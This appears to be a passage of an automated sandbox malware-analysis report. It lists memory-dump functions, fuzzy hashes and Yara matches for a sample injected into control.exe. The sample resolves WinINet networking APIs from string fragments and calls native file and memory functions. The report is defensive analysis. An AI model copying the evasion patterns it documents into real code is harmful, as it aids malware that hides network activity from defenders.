Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a9330932e22e8aa6e09a152d214aae1bb059c4fbeda547239948ca7b3f3ea0
Instruction ID: dbb8f274276553d361f6cf92e838b1212959c60a1fa470433d813ed4d4aa9c16
Opcode Fuzzy Hash: b4a9330932e22e8aa6e09a152d214aae1bb059c4fbeda547239948ca7b3f3ea0
Instruction Fuzzy Hash: 1D9002B170101402D102615944546460429D7D1385FD1C413E5414555D97658953B176

Uniqueness

Uniqueness Score: -1.00%

Function 05409B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68989b3aa808a6e1983b0b8f5a2ed4bf1421372056f70346a087119d9d93be8a
Instruction ID: dbeae97de5c2ba01c9b6fd3e754c4eaf8fa9abdc2aceeaba15dbe69c895e5ba8
Opcode Fuzzy Hash: 68989b3aa808a6e1983b0b8f5a2ed4bf1421372056f70346a087119d9d93be8a
Instruction Fuzzy Hash: 6F9002B174101802D140715984547470426D7D0641F91C412A4014554D9756896576F5

Uniqueness

Uniqueness Score: -1.00%

Function 0540A3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 643e7df44a55998099f033233e47c49d84dfb14f0a3b257315082ec23b5f9f2a
Instruction ID: 98be4fecb0f70029dbbfa14fcedd3c4222f34fe9a8de2667e4982d695bce7c19
Opcode Fuzzy Hash: 643e7df44a55998099f033233e47c49d84dfb14f0a3b257315082ec23b5f9f2a
Instruction Fuzzy Hash: 2F9002B170145002D1407159848464B5425A7E0341F91C812E4415554C97558856A265

Uniqueness

Uniqueness Score: -1.00%

Function 05409A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2606e12529b906f2e066e9627d3a0a86f0dc9442fc4a562ece301c769a2fe7a9
Instruction ID: 29cd3799f3386193d531bd850f5c111da88698d7914addea67764547c9077945
Opcode Fuzzy Hash: 2606e12529b906f2e066e9627d3a0a86f0dc9442fc4a562ece301c769a2fe7a9
Instruction Fuzzy Hash: DB9002B170141402D10061594848787042597D0342F91C412A9154555E97A5C8917575

Uniqueness

Uniqueness Score: -1.00%

Function 05409A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fff12b77453e13ffbfa67ece90b34e421780722ab6f4ac023bd195b357bd772e
Instruction ID: fc3c4acb47bf24263db13f6bce7466e97ae07229b750cc82cfd96c7f9dcfd4b3
Opcode Fuzzy Hash: fff12b77453e13ffbfa67ece90b34e421780722ab6f4ac023bd195b357bd772e
Instruction Fuzzy Hash: 4F9002B170145442D14062594844B4F452597E1242FD1C41AA8146554CDA5588556765

Uniqueness

Uniqueness Score: -1.00%

Function 05409670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: ef4cb3429457dc9a1427da78eef1f92f4a8fdf149059afd8a8a208cd85e2deec
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0545FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0545FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0540CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E05455720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E05455720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0545fdda
0x0545fde2
0x0545fde5
0x0545fdec
0x0545fdfa
0x0545fdff
0x0545fe0a
0x0545fe0f
0x0545fe17
0x0545fe1e
0x0545fe19
0x0545fe19
0x0545fe19
0x0545fe20
0x0545fe21
0x0545fe22
0x0545fe25
0x0545fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0545FDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0545FE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0545FE01

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 7d05539d59452d6738c150ea48c7d9fb57d5ca7e00055204a66bdfc47fa09be3
Instruction ID: 173d282a087c5d660f40d6f4f426d14c71906509c9ed5af609dc0e149cf1823a
Opcode Fuzzy Hash: 7d05539d59452d6738c150ea48c7d9fb57d5ca7e00055204a66bdfc47fa09be3
Instruction Fuzzy Hash: 71F0FC76240101BFE7201A55DC45FB7BF5AEB44730F240315FA14565D1DA62F86096F1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: control.exe PID: 3448 Parent PID: 3388 control.exeCOMMON

Executed Functions

Function 031081BA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,03103B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03103B97,007A002E,00000000,00000060,00000000,00000000), ref: 0310820D

Strings

.z`, xrefs: 031081FD, 03108208

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 802bc42834cfc9ea919b083fd2cdae45d096f0ee3326668abed11f3f662734ee
Instruction ID: 5eb7f59f72aa36663f1cf2e039340c0752b60430623d516e24ecf453ab12b7d9
Opcode Fuzzy Hash: 802bc42834cfc9ea919b083fd2cdae45d096f0ee3326668abed11f3f662734ee
Instruction Fuzzy Hash: 1601B6B6245108AFCB08CF98DC94DEB77A9AF8C354F158258FA1DD7240C630E911CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 031081C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,03103B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03103B97,007A002E,00000000,00000060,00000000,00000000), ref: 0310820D

Strings

.z`, xrefs: 031081FD, 03108208

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 01f4c6adac42b7ea0c67ecf8300932385c45e816a1976ef49d433121ed078d53
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 47F0B2B2204208ABCB08CF88DC84EEB77ADAF8C754F158248FA1D97240C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 03108270, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(03103D52,5E972F59,FFFFFFFF,03103A11,?,?,03103D52,?,03103A11,FFFFFFFF,5E972F59,03103D52,?,00000000), ref: 031082B5

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: afe53efa0e9bfcfa0011b1c1d1718f8e58ace58e76bf1bbfb32cae3c10c87adb
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: B7F0A4B6200208ABCB14DF89DC80EEB77ADAF8C754F158648BA1D97241DA30E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 031083A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,030F2D11,00002000,00003000,00000004), ref: 031083D9

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 8ab97c377bd9178c26c15a323354ae8d24ff3263ed62f6d6779df22664b41dea
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 9BF015B6200208ABCB14DF89CC80EAB77ADAF8C650F118648FE1897241C630F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 031082F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(03103D30,?,?,03103D30,00000000,FFFFFFFF), ref: 03108315

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: b951fa094995c0538037f3f9b6bdb1c9e861d0b21d9797235bd4d9aa30d9f28d
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: B2D01276200314ABD710EF98CC45E97775CEF48650F154555BA185B241C570F90087E0

Uniqueness

Uniqueness Score: -1.00%

Function 0310826A, Relevance: 1.5, APIs: 1, Instructions: 12filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(03103D52,5E972F59,FFFFFFFF,03103A11,?,?,03103D52,?,03103A11,FFFFFFFF,5E972F59,03103D52,?,00000000), ref: 031082B5

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: dbec16052d9e23fa98051de3ceb3950da3378b057447cba4127a16603d3fec88
Instruction ID: f998588119f1989516b3bad2f160a7e5e505148c150d78c3071ba09195023ab3
Opcode Fuzzy Hash: dbec16052d9e23fa98051de3ceb3950da3378b057447cba4127a16603d3fec88
Instruction Fuzzy Hash: 0BC02B7C0140040B9718A3C07A44CA2E30DFFC52103004E03E44C60100416088028590

Uniqueness

Uniqueness Score: -1.00%

Function 04E595D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E595DA

Memory Dump Source

Source File: 00000008.00000002.573128709.0000000004DF0000.00000040.00000001.sdmp, Offset: 04DF0000, based on PE: true

Associated: 00000008.00000002.573522496.0000000004F0B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.573541338.0000000004F0F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 49cfe66f38527a3a1fcf7298196dff86b321885a3c9669cf31ddc862b7cae86c
Instruction ID: e6d653c0c4a7c94fce5f15f78240a37a28cc65090f08e6219c05944c7bcb1d6f
Opcode Fuzzy Hash: 49cfe66f38527a3a1fcf7298196dff86b321885a3c9669cf31ddc862b7cae86c
Instruction Fuzzy Hash: E39002A1342004036105715A4815A16400E97E0285F91D061E1115590DC965D8917165

Uniqueness

Uniqueness Score: -1.00%

Function 04E59540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E5954A

Memory Dump Source

Source File: 00000008.00000002.573128709.0000000004DF0000.00000040.00000001.sdmp, Offset: 04DF0000, based on PE: true

Associated: 00000008.00000002.573522496.0000000004F0B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.573541338.0000000004F0F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4c37df566359e742c51af413f0edc862dfb2ae6a19866bbc923b6b29b64786f9
Instruction ID: d8273b56486309de34653ee5b44da2854dfd7eed9a45f9ef0466bd00a9a5c5c2
Opcode Fuzzy Hash: 4c37df566359e742c51af413f0edc862dfb2ae6a19866bbc923b6b29b64786f9
Instruction Fuzzy Hash: CD900265351004032105A55A0B05907004A97D53D5791D061F1116550CDA61D8616161

Uniqueness

Uniqueness Score: -1.00%

Function 04E596E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E596EA

Memory Dump Source

Source File: 00000008.00000002.573128709.0000000004DF0000.00000040.00000001.sdmp, Offset: 04DF0000, based on PE: true

Associated: 00000008.00000002.573522496.0000000004F0B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.573541338.0000000004F0F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d6a6b23d576acef6ac8fed25c26269f3344434202f0c0ebb61a01ad8588ca2e1
Instruction ID: 0ee59f14d5e3b818cb8d8c927c4208b3d0c102820dd26007e027f2a07fa2e2f2
Opcode Fuzzy Hash: d6a6b23d576acef6ac8fed25c26269f3344434202f0c0ebb61a01ad8588ca2e1
Instruction Fuzzy Hash: 2790027134108C02F110615A8805B4A000997D0385F95D451A4525658D8AD5D8917161

Uniqueness

Uniqueness Score: -1.00%

Function 04E596D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E596DA

Memory Dump Source

Source File: 00000008.00000002.573128709.0000000004DF0000.00000040.00000001.sdmp, Offset: 04DF0000, based on PE: true

Associated: 00000008.00000002.573522496.0000000004F0B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.573541338.0000000004F0F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 613412e5687b64f5ee5a846d180ec82d0bb37144734d3a451eee032c6efee4bb
Instruction ID: de480689e8e78a89643da3850cc0f853cdf729beaab2b59e09640d81e774a770
Opcode Fuzzy Hash: 613412e5687b64f5ee5a846d180ec82d0bb37144734d3a451eee032c6efee4bb
Instruction Fuzzy Hash: EA90027134100C42F100615A4805F46000997E0385F91D056A0225654D8A55D8517561

Uniqueness

Uniqueness Score: -1.00%

Function 04E59660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E5966A

Memory Dump Source

Source File: 00000008.00000002.573128709.0000000004DF0000.00000040.00000001.sdmp, Offset: 04DF0000, based on PE: true

Associated: 00000008.00000002.573522496.0000000004F0B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.573541338.0000000004F0F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5df3c326a5fd46ccf1c471c43dbe091af47ab60f125cec6f67d09ec0e691f046
Instruction ID: d9a194641471d43e0e2a406378816b2f5321bc52bfc632b6fe4f4ede2e5a5347
Opcode Fuzzy Hash: 5df3c326a5fd46ccf1c471c43dbe091af47ab60f125cec6f67d09ec0e691f046
Instruction Fuzzy Hash: B890027134100C02F180715A4805A4A000997D1385FD1D055A0126654DCE55DA5977E1

Uniqueness

Uniqueness Score: -1.00%

Function 04E59650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E5965A

Memory Dump Source

Source File: 00000008.00000002.573128709.0000000004DF0000.00000040.00000001.sdmp, Offset: 04DF0000, based on PE: true

Associated: 00000008.00000002.573522496.0000000004F0B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.573541338.0000000004F0F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8c1691aca42eaa3539fe799993ebfeaab5c0326a0b01d57236d29258490921a5
Instruction ID: c810c75d241110146ddbd8ba1d212f30c7e73f69224783e541d1b5d6b9d99b78
Opcode Fuzzy Hash: 8c1691aca42eaa3539fe799993ebfeaab5c0326a0b01d57236d29258490921a5
Instruction Fuzzy Hash: 0790027134504C42F140715A4805E46001997D0389F91D051A0165694D9A65DD55B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 04E59FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E59FEA

Memory Dump Source

Source File: 00000008.00000002.573128709.0000000004DF0000.00000040.00000001.sdmp, Offset: 04DF0000, based on PE: true

Associated: 00000008.00000002.573522496.0000000004F0B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.573541338.0000000004F0F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7f08a30e98f84c109e813265547f6ec38ad4ff48410135ac74b2bc4eb96ec66d
Instruction ID: c577d6f7930c43972960c25beaef9582acbf20970d7df4a9bd19425d3c738c5e
Opcode Fuzzy Hash: 7f08a30e98f84c109e813265547f6ec38ad4ff48410135ac74b2bc4eb96ec66d
Instruction Fuzzy Hash: 1E90027135114802F110615A8805B06000997D1285F91D451A0925558D8AD5D8917162

Uniqueness

Uniqueness Score: -1.00%

Function 04E59780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E5978A

Memory Dump Source

Source File: 00000008.00000002.573128709.0000000004DF0000.00000040.00000001.sdmp, Offset: 04DF0000, based on PE: true

Associated: 00000008.00000002.573522496.0000000004F0B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.573541338.0000000004F0F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 55a91fa65ecac46ff65633023a6d9fa97efb2c4d40d75343c69dd2a57a90401d
Instruction ID: 98102e5f40a533281b8b81fe07938f66f5f0d863e9830303415aaac08c5d6ac0
Opcode Fuzzy Hash: 55a91fa65ecac46ff65633023a6d9fa97efb2c4d40d75343c69dd2a57a90401d
Instruction Fuzzy Hash: 1590026935300402F180715A5809A0A000997D1286FD1E455A0116558CCD55D8696361

Uniqueness

Uniqueness Score: -1.00%

Function 04E59710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E5971A

Memory Dump Source

Source File: 00000008.00000002.573128709.0000000004DF0000.00000040.00000001.sdmp, Offset: 04DF0000, based on PE: true

Associated: 00000008.00000002.573522496.0000000004F0B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.573541338.0000000004F0F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 74a09c56bf04fe2b9c5ad617d14f1b82faa0ac3e6eaf30a9de2ee087f49a1fbd
Instruction ID: 45698580541cffac8176d6eb9114ab685c41d78c7aad680fc4cdb3b6e744d089
Opcode Fuzzy Hash: 74a09c56bf04fe2b9c5ad617d14f1b82faa0ac3e6eaf30a9de2ee087f49a1fbd
Instruction Fuzzy Hash: BC90027134100802F100659A5809A46000997E0385F91E051A5125555ECAA5D8917171

Uniqueness

Uniqueness Score: -1.00%

Function 04E59860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E5986A

Memory Dump Source

Source File: 00000008.00000002.573128709.0000000004DF0000.00000040.00000001.sdmp, Offset: 04DF0000, based on PE: true

Associated: 00000008.00000002.573522496.0000000004F0B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.573541338.0000000004F0F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 68343e92ca97f99e8c31aa0b28e353c655198103ce90e66c8a3638db2630fee0
Instruction ID: 6df0493b07d11ac9bd1a156f3adda784b9fd83d155d9cab1d138ba3ad5bfb75e
Opcode Fuzzy Hash: 68343e92ca97f99e8c31aa0b28e353c655198103ce90e66c8a3638db2630fee0
Instruction Fuzzy Hash: 5F90027134100813F111615A4905B07000D97D02C5FD1D452A0525558D9A96D952B161

Uniqueness

Uniqueness Score: -1.00%

Function 04E59840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E5984A

Memory Dump Source

Source File: 00000008.00000002.573128709.0000000004DF0000.00000040.00000001.sdmp, Offset: 04DF0000, based on PE: true

Associated: 00000008.00000002.573522496.0000000004F0B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.573541338.0000000004F0F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cacae52e4db0bd37a10e3d2d8335aac74b62f5059903968c458bfca1f9943ecc
Instruction ID: 760a70fedb5cba8796d3f54b3340832dea68b0242a19c1352e5138c8c8ef2009
Opcode Fuzzy Hash: cacae52e4db0bd37a10e3d2d8335aac74b62f5059903968c458bfca1f9943ecc
Instruction Fuzzy Hash: 74900261382045527545B15A4805907400AA7E02C5BD1D052A1515950C8966E856E661

Uniqueness

Uniqueness Score: -1.00%

Function 04E599A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E599AA

Memory Dump Source

Source File: 00000008.00000002.573128709.0000000004DF0000.00000040.00000001.sdmp, Offset: 04DF0000, based on PE: true

Associated: 00000008.00000002.573522496.0000000004F0B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.573541338.0000000004F0F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4d9a981909ae44e49d5fc1fb3f077b00fd6b16b80cdf20966bd426aebcdd8266
Instruction ID: 1017332bcf9984557aad5a53fe26bc63b2e0d7a2056663a08f31700927abf4b9
Opcode Fuzzy Hash: 4d9a981909ae44e49d5fc1fb3f077b00fd6b16b80cdf20966bd426aebcdd8266
Instruction Fuzzy Hash: 929002A138100842F100615A4815F060009D7E1385F91D055E1165554D8A59DC527166

Uniqueness

Uniqueness Score: -1.00%

Function 04E59910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E5991A

Memory Dump Source

Source File: 00000008.00000002.573128709.0000000004DF0000.00000040.00000001.sdmp, Offset: 04DF0000, based on PE: true

Associated: 00000008.00000002.573522496.0000000004F0B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.573541338.0000000004F0F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 38371cd689f5e91d3a449609fffae0d187f846002934b2e5da443f792a648ad7
Instruction ID: a18a444e97788762df4cf272b1c3216600239cdcdeba2c9bd8117dd8ccaa7961
Opcode Fuzzy Hash: 38371cd689f5e91d3a449609fffae0d187f846002934b2e5da443f792a648ad7
Instruction Fuzzy Hash: 709002B134100802F140715A4805B46000997D0385F91D051A5165554E8A99DDD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 04E59A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E59A5A

Memory Dump Source

Source File: 00000008.00000002.573128709.0000000004DF0000.00000040.00000001.sdmp, Offset: 04DF0000, based on PE: true

Associated: 00000008.00000002.573522496.0000000004F0B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.573541338.0000000004F0F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ddfe506f2ffc4a3e38d2edff538c1ae9228956e3a36fa31d417cb8293dec57ca
Instruction ID: 02097a538855ba5760ab291cc2258719711cd4ad7341b9a10194bb472670097d
Opcode Fuzzy Hash: ddfe506f2ffc4a3e38d2edff538c1ae9228956e3a36fa31d417cb8293dec57ca
Instruction Fuzzy Hash: 2C90026135180442F200656A4C15F07000997D0387F91D155A0255554CCD55D8616561

Uniqueness

Uniqueness Score: -1.00%

Function 031088D0, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 48networkCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 03108938

Strings

RequestA, xrefs: 03108932, 03108937
Http, xrefs: 031088EA
Requ, xrefs: 031088F8
HttpOpenRequestA, xrefs: 0310892A, 03108935
OpenRequestA, xrefs: 0310892E, 03108936
Open, xrefs: 031088F1
HttpOpenRequestA, xrefs: 031088DD
estA, xrefs: 031088FF

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: HttpOpenRequest
String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
API String ID: 1984915467-4016285707
Opcode ID: fea90beabff67b2b567d8da6d4b6fac2dcdbdf4ce93c97183384f69e53b9be53
Instruction ID: 8e49b918537f094b967909097a9a657cf239e9286a6364f206fe8710e80bafd9
Opcode Fuzzy Hash: fea90beabff67b2b567d8da6d4b6fac2dcdbdf4ce93c97183384f69e53b9be53
Instruction Fuzzy Hash: 1501E9B2905159AFCB04DF98D841DEF7BB9EB48210F158288FD48A7244D670ED10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 03108850, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON

Download Yara Rule

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 031088B8

Strings

ectA, xrefs: 0310887F
ConnectA, xrefs: 031088B2, 031088B7
Conn, xrefs: 03108878
Inte, xrefs: 0310886A
rnet, xrefs: 03108871
InternetConnectA, xrefs: 031088AA, 031088B5
rnetConnectA, xrefs: 031088AE, 031088B6

Memory Dump Source

Source File: 00000008.00000002.571950097.00000000030F0000.00000040.00000001.sdmp, Offset: 030F0000, based on PE: false

Yara matches

Similarity

API ID: ConnectInternet
String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
API String ID: 3050416762-1024195942
Opcode ID: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
Instruction ID: cb975274f2f179aa532c68c6141cbee263e0687f5f2839106e4e5579f6906acc
Opcode Fuzzy Hash: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
Instruction Fuzzy Hash: 0101E9B2909118AFCB14DF99D941EEFB7B9EB48310F154289BE08A7240D670EE10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 03108845, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 46networkCOMMON

Download Yara Rule

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 031088B8

Strings

ectA, xrefs: 0310887F
ConnectA, xrefs: 031088B2, 031088B7
Conn, xrefs: 03108878
Inte, xrefs: 0310886A
rnet, xrefs: 03108871
InternetConnectA, xrefs: 031088AA, 031088B5
rnetConnectA, xrefs: 031088AE, 031088B6

Memory Dump Source

